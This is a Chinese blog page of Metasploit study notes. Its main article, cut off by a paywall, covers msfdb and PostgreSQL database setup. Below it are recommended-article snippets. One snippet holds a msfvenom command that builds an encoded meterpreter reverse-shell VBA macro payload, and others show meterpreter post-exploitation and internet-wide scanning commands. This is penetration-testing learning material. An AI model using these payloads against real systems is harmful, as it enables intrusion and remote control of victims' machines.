msf 学习笔记(1)

最新推荐文章于 2024-10-04 22:37:47 发布
原创 最新推荐文章于 2024-10-04 22:37:47 发布 · 1.4k 阅读 · 11 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#MSF

本文记录了学习Metasploit框架的过程,包括msf数据库的连接操作,使用NMAP进行网络扫描,以及如何查看和处理扫描结果。还探讨了数据库的导入导出功能,并简单介绍了控制台命令的使用。

msf数据库链接

root@kali:~# msfdb reinit  ##数据库重建
root@kali:~# msfdb init        ##数据库链接
root@kali:~# service postgresql start  ##启动pgsql数据库(5432接口未启动状态【netstat -pantu | grep 5432】)
root@kali:~# msfdb start   ##启动msfdb
msf > db_status     ##查看链接状态
msf > db_rebuild_cache      ##重建cache
msf > db_connect -y /var/lib/pgsql/.msf4/database.yml       #手动链接数据库配置文件(已经建立数据库完成的情况)

NMAP扫描


                

                
                
        

    


  


        

            

                      
                        最低0.47元/天 解锁文章
                          
                      
            

        


    



                



	

		

			

				
					
Metasploit进阶知识之数据库支持

				
			

			

				

					K
				

				

					11-07
					
					924
					
				

			

		

		

			
				
如果上述任何命令打印堆栈跟踪或错误,你的第一步应该是运行./msfdb reinit(再次确保对询问你是否要删除数据库内容的提示选择“否”)并重新尝试导致错误的命令。但是,Metasploit 的许多功能都需要数据库,而 msfdb 是设置 Metasploit 兼容数据库的最简单方法。msfdb 是 Metasploit 所有安装中包含的脚本,可让你轻松设置和控制数据库以及能够将此数据库与 Metasploit 连接起来的 Web 服务。虽然 msfdb 是设置数据库最简单的方法,但你也可以手动设置。

			
		

	



                

            
              



	

		

			

				
					
MSF学习笔记11

				
			

			

				

					Shadow 爬爬记
				

				

					02-12
					
					1013
					
				

			

		

		

			
				
本地提权漏洞检测



meterpreter > run post/multi/recon/local_exploit_suggester 

迁移到指定进程



migrate -N explorer.exe

自动脚本



msf exploit(multi/handler) > set AutoRunScript  migrate -n explorer.exe

msf ...

			
		

	



              


  
              

                


	

		

			

				
					
msfconsole中db_namp的使用方法以及如何让msf连接数据库

				
			

			

				

					qq_59020256的博客
				

				

					03-11
					
					982
					
				

			

		

		

			
				
db_nmap -sS 192.168.251.139(IP地址)查看数据库postgresql连接状态、查询地址开放的端口号并将其写入到数据库中。将查询到的结果存入到数据库中。启动postgresql。

			
		

	





	

		

			

				
					
【Metasploit总结】之【MSF常用命令及信息收集】

				
			

			

				

					AA8j的博客
				

				

					12-10
					
					4168
					
				

			

		

		

			
				
初识MSF
smfconsole常用命令
msfconsole下可以直接使用终端命令,如ping等
msfdb start
# 启动msf数据库,msf数据库是使用的postgresql的5432端口,新版本的postgresql是5433无法使用,需要到/etc/postgresql/13/main/postgresql.conf下修改为5432端口
msfconsole -q
# 启动msfconsole(-q为安静启动)
db_status
# 查看数据库状态,若显示no connect,先exit 

			
		

	



		

			
		



	

		

			

				
					
老男孩学习第一天笔记

				
			

			

				

					weixin_43693393的博客
				

				

					09-04
					
					284
					
				

			

		

		

			
				
课程安排

3天预科
一个半月基础
三周进阶知识
5周web基础
2.5个月项目

3天预科内容概要

day01安装环境



Python安装


Pycharm安装


记笔记的工具Typora安装
2.day02企业级应用


码云(github)


git
3.思维导图,学习笔记的制作,博客园撰写,排bug技巧


安装之前
1.计算机组成结构

cpu,硬盘,内存,输入输出设备,主板...

			
		

	





	

		

			

				
					
kali 下metasploit (msf)初始化使用

					
热门推荐

				
			

			

				

					StriveBen的博客
				

				

					06-14
					
					2万+
					
				

			

		

		

			
				
首先启动postgresql,命令在图中;

然后初始化数据库

进入msf框架

查看一下数据库状态

如果不太熟悉,可以查看具体使用手册




如果执行search时,很慢,而且还提示Module database cache not build yet的话,

我们可以这样解决问题


将数据库再次初始化,并且重新建一下cache,再试一下是不是很快了。

			
		

	





	

		

			

				
					
MSF学习笔记10)

				
			

			

				

					Shadow 爬爬记
				

				

					12-11
					
					774
					
				

			

		

		

			
				
宏代码生成root@kali



root@kali:~/Desktop# msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.56.103 LPORT=5555 -e x86/shikata_ga_nai -f vba-exe



利用session 扩大战果



生成后门s

			
		

	





	

		

			

				
					
掌握MSF认证:高级项目管理深度学习笔记

				
			

			

				

					
				

			

		

		

			
				
【描述】微软认证:高级项目管理MSF学习笔记  【标签】MSF 微软认证  ### 知识点解析  #### 微软解决方案框架(Microsoft Solutions Framework,MSFMSF 是微软提供的一套用于指导项目和团队管理、产品开发以及...

			
		

	





	

		

			

				
					
红日靶场1学习笔记

					
最新发布

				
			

			

				

					一颗小白菜的博客
				

				

					10-04
					
					1336
					
				

			

		

		

			
				
一个靶场看起来不大,打起来还是有很多方法和注意的事项。比如说通内网的方法,有用frp的,还有用smb、写路由的,还有提权的各种方法,值得大家探索,毕竟多一种方法多一条路。靶场可以很快打完,但是写文章有时候也是比较麻烦的,不过这也算是一种修行。小小脚本小子,还需多多学习,写的不好的地方大家多多批评指正。还有七个靶场,继续加油!


			
		

	





	

		

			

				
					
MSF使用1

				
			

			

				

					xhscxj的博客
				

				

					06-12
					
					3858
					
				

			

		

		

			
				
进入kali中文件,将原有的源注释掉,换上清华的源
进行更新msf:辅助模块,辅助渗透(端口扫描、登录密码爆破、漏洞验证等)
:漏洞利用模块,包含主流的漏洞利用脚本,通常是对某些可能存在漏洞的目标进行漏洞利用。命名规则:操作系统/各种应用协议分类
:攻击载荷,主要是攻击成功后在目标机器执行的代码,比如反弹shell的代码
:后渗透阶段模块,漏洞利用成功获得meterpreter之后,向目标发送的一些功能性指令,如:提权等
:编码器模块,主要包含各种编码工具,对payload进行编码加密,以便绕过入侵检测和过

			
		

	





	

		

			

				
					
MSF数据库初始化

				
			

			

				

					L_KevinK的博客
				

				

					08-27
					
					4815
					
				

			

		

		

			
				
MSF数据库初始化(1.1)第一次进入 msf 发现数据库并没有连接,因为 msf 数据库需要手工创建(1.2)启动 postgresql 服务(1.3)初始化 msf 数据库(1.4)重新进入 msf ,输入 db_status ,可见数据库已自动连接
(1.1)第一次进入 msf 发现数据库并没有连接,因为 msf 数据库需要手工创建

(1.2)启动 postgresql 服务
servic...

			
		

	





	

		

			

				
					
MSF(Metasploit Framework)详细教程

				
			

			

				

					qq_41245301的博客
				

				

					12-28
					
					5443
					
				

			

		

		

			
				
Metasploit 是一个开源的渗透测试开源软件,也是一个逐步发展成熟的漏洞研究与渗透测试代码开发平台,此外也将成为支持整个渗透测试过程的安全技术集成开发与应用环境,2009年10月,Metasploit项目被一家渗透测试技术领域的知名安全公司Rapid7所收购。Rapid7公司随后与2010年10月推出了Metasploit Express 和Pro商业版本。优点: 模块化,灵活框架,界面友好,简单易用,代码安全。

			
		

	





	

		

			

				
					
msf

				
			

			

				

					u010472385的专栏
				

				

					05-11
					
					1679
					
				

			

		

		

			
				
0xx1 msfd interface
--------------

//msfd 是一个打开网络网络接口的工具,可以让一个或多个用户远程连接到msf安装机器上远程使用msf

例子

1.打开端口的命令

# msfd -a   -P 

2.查看是否打开端口

# netstat -tnl

3.远程连接MSF

# nc  

4.结束打开的端口

			
		

	





	

		

			

				
					
Manjaro安装配置Msf(Metasploit)并配置msfdb数据库

				
			

			

				

					weixin_45629684的博客
				

				

					07-18
					
					1960
					
				

			

		

		

			
				
简介
最近更换了Manjaro作为我的主力系统,在安装常用的渗透测试工具的时候,安装msf遇到了一些问题
安装
Arch系的pacman之强早有所耳闻,但是没想到有这么强,Msf都可以直接Pacman
sudo pacman -S metasploit

至此,msf就成功安装了
配置
问题就出来了msf数据库的配置上,在安装好postgresql之后,仍然无法通过msfdb进行init
Missing requirement: 'bundle' does not appear to be installe

			
		

	





	

		

			

				
					
Kali-msfdb-Postgresql报错排查处理

				
			

			

				

					灰蜗牛
				

				

					10-26
					
					2233
					
				

			

		

		

			
				
目录1.报错2.解决方法3.排查过程
1.报错
虚假的报错,关键词:
┌──(xavier㉿xavier)-[~]
└─$ psql
psql: 错误: 无法连接到服务器:无法联接到服务器: 没有那个文件或目录
        服务器是否在本地运行并且在 Unix 域套接字
        "/var/run/postgresql/.s.PGSQL.5432"上准备接受联接?

真实的报错,关键词:Postgresql日志文件:
┌──(xavier㉿xavier)-[~]
└─$ sudo tail /v

			
		

	





	

		

			

				
					
内网渗透笔记——msf

				
			

			

				

					wang_zui_zui的博客
				

				

					01-22
					
					4963
					
				

			

		

		

			
				
Masscan

号称五分钟扫遍互联网


性能优越,极限速度 1000w/s,参数 跟nmap 差不多


-p 80,8000-8100 10.0.0.0/24
--max-rate=100000  //发包的极限速度


masscan 0.0.0.0/0 -p 0-65535  //扫描整个互联网的所有端口

不要轻易尝试.......


Metasploit(msf)



一旦出现漏洞,出现利用漏洞的方法,则会马上收录——傻瓜式攻击

早期想要利用漏洞——需知道漏洞的poc和exp...

			
		

	





	

		

			

				
					
【渗透测试笔记】之【初探MSF

				
			

			

				

					2401_84971075的博客
				

				

					05-13
					
					384
					
				

			

		

		

			
				
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!

			
		

	





	

		

			

				
					
MSF使用详解

				
			

			

				

					m0_52051132的博客
				

				

					10-19
					
					8677
					
				

			

		

		

			
				
一、 Meterpreter是什么Meterpreter是Metasploit框架中的一个利器,作为漏洞溢出后的攻击载荷使用,攻击载荷在触发漏洞后会返回一个由我们控制的通道,可用于远程执行命令!Metasploit提供了各个主流平台的Meterpreter版本,包括Windows、Linux,同时支持x86、x64平台,另外,Meterpreter还提供了基于PHP和Java语言的实现。Meterpreter的工作模式是纯内存的,好处是启动隐藏,很难被杀毒软件监测到。

			
		

	



              




          




        



    





    



      

      

        
      

      





	

		评论	
	

  

	
    

      

      

      

        
        

          
          

            

              成就一亿技术人!
            

            

              拼手气红包6.0元
            

          

        

        

          

            还能输入1000个字符
          

          

             
          

          

            

              红包
              添加红包
            

            

              表情包
              插入表情
              

                

              

            

            

              表情包
              代码片
              

                
              

            

            

              
              
              
              
              
              
              
            

          

        

      

    

		

			

			

			

					 条评论被折叠 查看
			

			

				
			

		

	

	




  

    

      添加红包
      
    

    

      

        
        

          
          
        

        
请填写红包祝福语或标题

      

      

        
        

          
          
        

        
红包个数最小为10个

      

      

        
        

          
          
        

        
红包金额最低5元

      

      

        
        

          当前余额3.43前往充值 >
        

      

      

        

          需支付:10.00

        
        
      

    

  





  

    
    
  

  

    
    
  








  

    

      

        

          

            
            
成就一亿技术人!

          

          

        

        

          

          

            领取后你会自动成为博主和红包主的粉丝
            规则
          

        

      

      

        

          

            
              
            
            

              
hope_wisdom
 发出的红包
            

          

        

        

          

          

          

        

      

    

    

  



      
      

      
实付

      
使用余额支付

      

        

          

            
            点击重新获取
          

        

        
扫码支付

      

      

        
          
            
          
          
        
      

      

        
        钱包余额
          0
          

            
            

              

                
抵扣说明:

                
 1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
 2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

              

            

          

      

      余额充值